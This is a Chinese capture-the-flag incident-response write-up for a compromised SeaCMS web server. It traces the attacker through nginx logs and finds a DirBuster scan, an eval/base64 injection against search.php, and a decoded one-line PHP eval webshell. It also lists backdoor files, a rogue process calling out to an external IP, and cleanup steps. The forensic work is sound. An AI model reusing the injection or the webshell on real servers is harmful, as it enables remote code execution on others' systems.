AI摘要:文章详细介绍了BugKu PAR网络安全事件应急响应的过程,包括提交攻击者的IP地址,识别攻击者使用的工具,确定首次攻击成功的时间,找到攻击者写入的恶意后门文件和密码,识别隐藏在正常web应用代码中的恶意代码,识别系统中存在的恶意程序进程,修复网站漏洞,以及删除恶意程序、文件、代码等步骤。
统计nginx
日志中各个ip访问的次数
root@bugku:/var/log/nginx# awk '{print $1}' access.log | sort | uniq -c | sort -nr
15357 38.207.130.14
16 112.19.25.194
2 212.70.149.142
2 149.50.96.22
1 198.235.24.139
1 192.241.229.42
1 185.196.9.102
1 141.98.11.60
1 141.98.11.52
结合题目知道38.207.130.14
为攻击者ip
grep '38.207.130.14' access.log
发现大量ua
为DirBuster-1.0-RC1 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)
的日志
所以使用的工具为DirBuster
审查日志找到时间戳[03/Nov/2023:15:01:13 +0800]
故攻击成功时间为03/11/2023:15:03:35
得到日志
38.207.130.14 - - [03/Nov/2023:15:03:35 +0800] "POST /search.php?eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2EucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/PicpOw==')); HTTP/1.1" 200 4527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36"
对参数
解码得到
file_put_contents('a.php','<?php eval($_POST[1]); ?>');
所以写入shell
路径为
/var/www/html/a.php
如上,得到的密码为1
没别的办法,一个个看最终找到/var/www/html/include/webscan/360webscan.php
查看进程找到可疑进程/var/crash/php-fpm
运行php-fpm
并使用netstat -anutp
得到38.95.101.254:443
打开首页发现使用的海洋CMS
搜索资料得到修改/var/www/html/include/main.class.php
文件里面的parseIf
方法,在数组后面加入一个成员_SERVER
/var/www/html/include/webscan/360webscan.php
中找到的恶意代码webshell
文件/var/www/html/a.php
/var/crash/php-fpm
crontab -e -u www-data